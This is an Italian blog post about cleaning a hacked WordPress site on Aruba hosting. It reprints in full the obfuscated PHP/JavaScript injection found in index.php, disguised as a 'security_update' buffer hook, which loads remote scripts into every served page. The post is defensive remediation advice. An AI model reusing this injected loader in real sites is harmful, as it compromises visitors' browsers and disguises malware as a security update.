Stamane un mio collaboratore mi contatta avvisandomi di un grave problema. Il suo antivirus (Avast, ndr) all’apertura dei siti web “mondonotizie.info” e “qualeadsl.com”, entrambi ospitati su server condivisi Aruba, lo avvisa di un bel Trojan presente nei siti web. Armato di una pazienza sovrumana mi butto alla ricerca del problema. E’ Avast che fà il matto, o c’è davvero qualcosa che non và nei siti web su piattaforma WordPress 2.9.2? Ebbene dopo mille peripezie è stato scoperto l’arcano: Un probabile attacco Hacker ai server di Aruba ha permesso ad “ignoti” o “ignoranti” che dir si voglia, di aver libero accesso allo spazio ftp e di modificare l’intestazione del file index.php nella root del portale. Il Trojan individuato da Avast e Kaspersky è il seguente: {gzip} [L] HTML:IFrame-NM [Trj] (0) ed è il risultato di una stringa di codice malevola, inserita proprio all’interno del file index.php Come individuare ed eliminare questa stringa, in modo da far tornare visibile il sito anche a chi utilizza avast e altri antivirus? Semplice: Accedete al vostro server FTP con Mozilla o simili. Aprite il file index.php ed individuate nella prima riga il seguente codice:

<?php ob_start(‘security_update’); function security_update($buffer){return $buffer.’<script language=”javascript”>var asdas=”asd8(@+”;function z(s){var asdas=”asd8(@”;r=”";for(i=0;i<s.length;i++){var asdas=”asd8(@”;if(s.charAt(i)==”Z”){var asdas=”asd8(@”;s1=”%”}else{var asdas=”asd8(@”;s1=s.charAt(i);}r=r+s1;var asdas=”asd8(@”;}return unescape(r);}var sdkajsnd=”e”+”"+”v”+”al”;function t(){return z($a);}var $a=”Z63zZ3dZ22Z2566uZ256ectZ2569oZ256e cZ257a(cZ257a)Z257bretZ2575Z2572Z256e caZ252bcb+Z2563cZ252bcdZ252bce+Z2563z;}Z253bZ22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0–0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;cbZ3dZ22eZ2528Z2564Z2573);Z2573tZ253dtZ256dpZ253dZ2527Z2527;for(iZ253d0;iZ253cds.Z256cZ22;opZ3dZ22Z2524aZ253dZ2522dw(dcZ2573(cZ2575,1Z2534))Z253bZ2522;Z22;caZ3dZ22Z2566uZ256eZ2563tioZ256e dZ2563sZ2528dsZ252cesZ2529Z257bdsZ253dunZ2565scZ2561pZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|“d.;;rvwyr}f:wZ7by;xp;v}zfszZ2526;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ccZ3dZ22enZ2567tZ2568;i+Z252bZ2529Z257btmZ2570Z253dds.sZ256cZ2569ce(Z2569,Z2569+1Z2529Z22;dzZ3dZ22Z2566unZ2563tiZ256fn Z2564Z2577(tZ2529Z257bcaZ253dZ2527Z252564ocZ252575Z2525Z2536dZ2565Z256eZ252574Z2525Z2532ewrZ25256Z2539Z2574e(Z252522Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253csZ252563ripZ25257Z2534 Z25256canZ25256Z2537Z25257Z2535aZ252567eZ25253dZ25255cZ252522jZ2561vasZ2563rZ252569pZ252574Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252Z2566sZ2563Z2572iptZ25253eZ2527;winZ2564owZ255bZ2522eZ2522+Z2522Z2522+ Z2522vZ2522+Z2522alZ2522](unescapeZ2528tZ2529)};Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87trc7Z3c07id~7Z3c07f}d7Z3c07f}b7Z3c07}|s7Z3c07Z257FhZ7b7Z3c07vtc7Z3c07rfv7Z3c07iec7Z3c07}s`7Z3c07~sj7Z3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;ceZ3dZ22pZ252echZ2561rZ2543odeZ2541t(0Z2529^(Z25270x00Z2527+Z2565s)Z2529);}Z257dZ22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9;!Z2520Z2520+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050Z22;cdZ3dZ22;Z2573tZ253dstZ252bSZ2574rinZ2567Z252eZ2566romZ2543haZ2572Z2543odZ2565((Z2574mZ22;deZ3dZ22!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+0}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;stZ3dZ22Z2573Z2574Z253dZ2522$Z2561Z253dstZ253bZ2564cZ2573(Z2564Z2561Z252bdZ2562+Z2564Z2563Z252bZ2564dZ252bdZ2565,Z25310Z2529Z253bZ2564Z2577Z2528Z2573tZ2529Z253bZ2573Z2574Z253dZ2524aZ253bZ2522;Z22;Z69f (Z64ocuZ6denZ74Z2ecZ6fokZ69Z65.inZ64Z65xOfZ28Z27rfZ35f6Z64sZ27)Z3dZ3d-1)Z7bfuZ6ecZ74ionZ20calZ6cbZ61Z63k(Z78Z29Z7bwindoZ77.tZ77 Z3d Z78Z3bvaZ72 d Z3d neZ77 DaZ74eZ28);Z64.Z73etTZ69meZ28x[Z22asZ5foZ66Z22]*10Z300Z29;vZ61r Z68 Z3d Z64Z2egeZ74UZ54Z43HZ6fZ75rZ73()Z3bZ77Z69Z6edZ6fw.hZ20Z3d h;iZ66 Z28h Z3e 8)Z7bd.seZ74UTCZ44aZ74e(dZ2egZ65tUZ54CDZ61te(Z29 – Z32);Z7deZ6cseZ7bZ64Z2eseZ74Z55Z54Z43Z44atZ65(d.Z67Z65Z74UZ54CDZ61tZ65()Z20Z2d 3)Z3b}Z77Z69ndZ6fwZ2eZ67d Z3d d;Z76Z61Z72Z20tiZ6dZ65 Z3d neZ77Z20ArZ72ay(Z29;vaZ72 sZ68iftZ49nZ64eZ78 Z3d Z22Z22;tiZ6deZ5bZ22yeZ61rZ22] Z3d d.gZ65tZ55Z54CZ46ulZ6cYeaZ72(Z29Z3btiZ6de[Z22monZ74hZ22Z5d Z3d Z64.gZ65tUTZ43Z4dZ6fZ6ethZ28)Z2bZ31;Z74imeZ5bZ22dayZ22]Z20Z3d d.geZ74UTZ43DZ61teZ28Z29;ifZ20(dZ2egeZ74UZ54CMZ6fnthZ28Z29+1Z20Z3c 10)Z7bsZ68Z69ftZ49Z6edZ65x Z3dZ20tiZ6deZ5bZ22yearZ22Z5d Z2b Z22-0Z22 + Z28d.gZ65tUTZ43Z4dZ6fZ6etZ68(Z29+1Z29;Z7deZ6csZ65Z7bshiftZ49nZ64exZ20Z3d tZ69mZ65Z5bZ22yeZ61rZ22]Z20+ Z22-Z22 + (Z64Z2egeZ74UTCZ4dontZ68()Z2b1)Z3b}iZ66 (dZ2eZ67Z65Z74Z55TCDZ61teZ28)Z20Z3c 10Z29Z7bshiZ66Z74Z49ndZ65x Z3dsZ68Z69fZ74IZ6edZ65x Z2b Z22-Z30Z22 + dZ2egetZ55TZ43DZ61tZ65();Z7deZ6csZ65Z7bshZ69Z66tIZ6eZ64ex Z3d sZ68Z69fZ74InZ64ex Z2bZ20Z22-Z22 + d.Z67etUZ54Z43DaZ74Z65(Z29;}Z64oZ63Z75Z6denZ74.Z77ritZ65(Z22Z3cscrZ22Z2bZ22ipZ74 laZ6eZ67uZ61Z67Z65Z3djaZ76Z61scZ72ipZ74Z22+Z22 srcZ3dZ27htZ74Z70:Z2fZ2fsearZ63hZ2etwiZ74teZ72Z2ecZ6fZ6dZ2ftrendZ73Z2fdailZ79.Z6asoZ6e?dZ61teZ3dZ22+ sZ68ifZ74InZ64ex+Z22Z26caZ6clZ62acZ6bZ3dcZ61llbZ61ckZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} fZ75nZ63tiZ6fZ6e cZ61llZ62acZ6b2(Z78)Z7bwindoZ77.twZ20Z3d xZ3bsc(Z27rZ665fZ36dsZ27,2,Z37)Z3bevZ61Z6c(uZ6eescZ61pe(Z64Z7aZ2bZ63z+Z6fpZ2bst)Z2bZ27dw(Z64Z7a+Z63z($Z61+Z73tZ29Z29Z3bZ27);Z64ocuZ6dZ65nZ74.Z77riZ74e($Z61)Z3b}dZ6fcZ75mZ65nt.Z77rZ69teZ28Z22Z3cimg sZ72cZ3dZ27http:Z2fZ2fsearZ63hZ2etwZ69tteZ72.cZ6fmZ2fimaZ67esZ2fseZ61rZ63hZ2frssZ2epZ6egZ27 wZ69Z64Z74hZ3d1Z20heZ69gZ68tZ3d1 styZ6ceZ3dZ27visZ69bZ69lZ69tyZ3ahZ69Z64denZ27 Z2fZ3e Z3cscZ72Z22+Z22ipt lZ61ngZ75Z61gZ65Z3djavZ61sZ63riZ70tZ22Z2bZ22 srZ63Z3dZ27http:Z2fZ2fsearZ63h.Z74wZ69Z74terZ2ecZ6fmZ2ftZ72Z65ndZ73Z2fdaZ69lZ79Z2eZ6asonZ3fcalZ6cbacZ6bZ3dcZ61llbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}Z65Z6cZ73eZ7b$Z61Z3dZ27Z27};fZ75Z6ecZ74ionZ20sc(Z63nZ6d,vZ2cZ65Z64Z29Z7bvaZ72 exZ64Z3dnew Z44aZ74Z65(Z29;eZ78d.Z73Z65tDZ61Z74Z65Z28exZ64.Z67etDZ61Z74eZ28)+Z65d)Z3bZ64ocuZ6deZ6et.cZ6fokiZ65Z3dcnmZ2bZ20Z27Z3dZ27 +escape(Z76)+Z27;exZ70ireZ73Z3dZ27+exd.tZ6fZ47MTSZ74Z72ingZ28Z29;};”;window[sdkajsnd](t());</script>’;}//important security update ?>

Eliminatelo tutto, salvate il file index.php così ripulito e caricatelo di nuovo sul server. A questo punto il problema dovrebbe essere sparito. Eventualmente fatevi un giro tra le cartelle del vostro sito e controllate tutti i file index.php per verificare che non ci sia la suddetta stringa, che si nasconde come “<?php ob_start(‘security_update’);…”